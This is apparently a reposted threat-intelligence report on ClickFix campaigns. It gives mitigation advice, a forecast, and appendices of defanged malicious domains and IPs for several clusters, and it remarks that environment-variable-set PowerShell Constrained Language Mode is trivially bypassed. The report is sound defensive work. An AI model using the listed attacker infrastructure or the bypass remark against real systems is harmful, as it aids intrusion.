  • Restrict Terminal and PowerShell Execution: Implement PowerShell Constrained Language Mode (CLM) and use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unsigned scripts and the misuse of living-off-the-land binaries (LOLBins). CLM is only robust when it is enforced by a WDAC or AppLocker policy; setting it through the __PSLockdownPolicy environment variable is intended for testing and is trivially bypassed. On macOS, restrict Terminal and other shell interpreters (for example, zsh and bash) using application control policies enforced via mobile device management (MDM), and leverage System Integrity Protection (SIP) and endpoint security controls to limit unauthorized script execution and abuse of native command-line utilities.

  • User Awareness and Training: Conduct targeted social engineering simulations that specifically educate users on the dangers of "manual verification" prompts that require copying and pasting commands into system utilities.


Outlook


The identification of five parallel operational clusters targeting diverse sectors, including accounting, travel, real estate, and legal services, indicates that the ClickFix methodology has transitioned from a niche technique to a standardized template within the cybercriminal ecosystem. This standardized "run and repeat" model is facilitating broader adoption by both lower-tier "traffers" and sophisticated advanced persistent threat (APT) groups. Threat actors are able to maintain operational continuity even when individual domains are blocked due to the availability of disposable infrastructure and shared technical templates.


Insikt Group assesses with high confidence that the ClickFix methodology will very likely remain a heavily used initial access vector throughout 2026. The continued success of ClickFix is driven by its ability to bypass advanced browser-based security controls by shifting the point of exploitation to user-assisted manual actions. As long as native system utilities such as PowerShell and Terminal remain accessible to end-users, ClickFix will continue to offer threat actors a high-return, low-complexity alternative to traditional exploit kits.


Looking ahead, ClickFix lures will likely become increasingly technically adaptive. Future iterations are expected to incorporate more granular browser fingerprinting to conditionally serve payloads based on a victim's hardware, geographic location, or organizational profile. Furthermore, since threat actors are already purposefully documenting bypass techniques for static analysis engines within their code, Insikt Group anticipates a long-term trend toward more resilient and obfuscated staging environments. This convergence of sophisticated social engineering and LotL techniques necessitates a shift in defensive strategy, moving away from simple indicator blocking toward aggressive behavioral hardening of the system utilities that ClickFix relies upon.


Appendix A: Indicators of Compromise


Appendix B: Cluster 1 — Intuit QuickBooks Indicators

Domain | IP Address | ASN/AS | First Seen | Last Seen
mrinmay[.]net | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-21 | 2026-03-05
guypinions[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-20 | 2026-02-25
4freepics[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-20 | 2026-02-24
ariciversontile[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-20 | 2026-02-25
quiptly[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-20 | 2026-02-25
anthonydee[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-20 | 2026-02-26
ned.coveney-ltd[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2025-10-10 | 2025-11-20
grandmastertraders[.]traderslinkfx[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2025-12-01 | 2026-02-24
nhacaired88[.]com | 193[.]58[.]122[.]97 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-10 | 2026-03-05
elive777a[.]com | 94[.]156[.]112[.]115 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-02 | 2026-03-05
fomomforhealth[.]com | 94[.]156[.]112[.]115 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-02 | 2026-03-05
suedfactoring[.]it[.]com | 45[.]93[.]20[.]141 | Chang Way Technologies Co. Limited (AS57523) | 2026-01-30 | 2026-02-09
shopifyservercloud[.]com | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2026-01-10 | 2026-03-05
elive123go[.]com | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2026-01-09 | 2026-03-05
hostmaster[.]extracareliving[.]com | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2026-01-25 | 2026-03-05
orkneygateway[.]com | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2025-12-14 | 2026-03-05
ustazazharidrus[.]com | 87[.]236[.]16[.]20 | Beget LLC (AS198610) | 2026-02-02 | 2026-03-05
(domain missing from source table) | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2026-01-09 | 2026-02-01
deinhealthcoach[.]com | 193[.]222[.]99[.]212 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-16 | 2026-03-05
bancatangcode[.]com | 193[.]222[.]99[.]212 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-16 | 2026-03-05
billiardinstitute[.]com | 193[.]58[.]122[.]97 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-10 | 2026-03-05
yvngvualr[.]com | Cloudflare | Cloudflare | 2025-04-06 | 2026-03-05
visitbundala[.]com | Cloudflare | Cloudflare | 2025-03-10 | 2026-03-05
surecomforts[.]com | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2026-01-09 | 2026-03-05
theinvestworthy[.]com | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2025-12-13 | 2026-03-05
customblindinstall[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-21 | 2026-03-05
extracareliving[.]com | 45[.]93[.]20[.]50 | Chang Way Technologies Co. Limited (AS57523) | 2025-12-14 | 2026-03-05
subsgod[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-21 | 2026-03-05
traderslinkfx[.]com | 193[.]35[.]17[.]12 | PLAY2GO INTERNATIONAL LIMITED (AS215439) | 2026-02-21 | 2026-03-05

Appendix C: bibi.php Script

Appendix D: Cluster 2 — Booking.com Indicators

Indicator | IP Address | ASN | First Seen | Last Seen
sign-in-op-token[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-03-01 | 2026-03-03
thestayreserve[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-23 | 2026-02-24
accountpulse[.]help | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-16 | 2026-03-05
admin-activitycheck[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-22 | 2026-02-27
accountmime[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-21 | 2026-02-24
checkhelpdesk[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-18 | 2026-02-23
thepulseactivity[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-18 | 2026-02-23
checkaccountactivity[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-17 | 2026-02-23
account-helpdesk[.]top | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-15 | 2026-02-18
pulse-help-desk[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-13 | 2026-02-19
account-helpdesk[.]icu | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-10 | 2026-03-02
account-helpdesk[.]info | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-08 | 2026-02-11
helpdeskpulse[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-06 | 2026-02-09
account-help[.]info | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-08 | 2026-03-05
acconthelpdesk[.]com | 91[.]202[.]233[.]206 | Prospero (AS200593) | 2026-02-05 | 2026-03-03


Appendix E: Cluster 3 — Birdeye Indicators

Indicator | IP Address | ASN | First Seen | Last Seen
acebirdrep[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
bebirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankbox[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankfx[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankgo[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankinc[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankllc[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankmax[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdranktip[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankup[.]com | Cloudflare | Cloudflare | 2024-05-17 | 2026-03-05
birdrankus[.]com | Cloudflare | Cloudflare | 2024-05-17 | 2026-03-05
birdrankusa[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2024-05-16
birdrankvip[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrankzen[.]com | Cloudflare | Cloudflare | 2024-05-17 | 2026-03-05
birdrepbiz[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrepgo[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrephelp[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdreplab[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrepsys[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrepusa[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
birdrepuse[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
bitbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
bitbirdrep[.]com | Cloudflare | Cloudflare | 2024-05-17 | 2026-03-05
fixbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-17 | 2026-03-05
getbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
gobirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
helpbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
helpbirdrep[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
infobirdrep[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
justbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
mybirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
nowbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-17 | 2026-03-05
optbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
probirdrep[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
topbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
topbirdrep[.]com | Cloudflare | Cloudflare | 2024-05-17 | 2026-03-05
usbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2024-05-16
usebirdrep[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05
vipbirdrank[.]com | Cloudflare | Cloudflare | 2024-05-16 | 2026-03-05

Appendix F: Birdeye Cluster Javascript

Appendix G: Cluster 4 — Dual-Platform Selection Indicators

Indicator | IP Address | ASN | First Seen | Last Seen
valetfortesla[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-11-12 | 2026-03-05
macxapp[.]org | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-18 | 2025-06-18
apposx[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-13 | 2025-06-24
cryptonews-info[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-18 | 2025-12-20
macosx-app[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-14 | 2025-06-16
cryptoinfnews[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-14 | 2025-06-30
macxapp[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-14 | 2025-06-16
cryptoinfo-allnews[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-13 | 2025-06-30
appxmacos[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-13 | 2025-06-30
appmacintosh[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-12 | 2025-06-13
macosxappstore[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-09 | 2025-06-30
macosx-apps[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-09 | 2025-06-11
cryptoinfo-news[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-06-08 | 2025-06-29
financementure[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-05-27 | 2025-06-30
appsmacosx[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-05-27 | 2025-06-09
appmacosx[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-05-27 | 2025-06-14
macosxapp[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-05-27 | 2025-06-09
macosapp-apple[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-05-25 | 2025-05-26
macapps-apple[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-05-23 | 2025-05-24
macapp-apple[.]com | 45[.]144[.]233[.]192 | Baykov Ilya Sergeevich (AS41745) | 2025-05-13 | 2025-05-23

Source: RecordedFuture
Source Link: https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos


Copyright 2012 through 2026 - National Cyber Warfare Foundation - All rights reserved worldwide.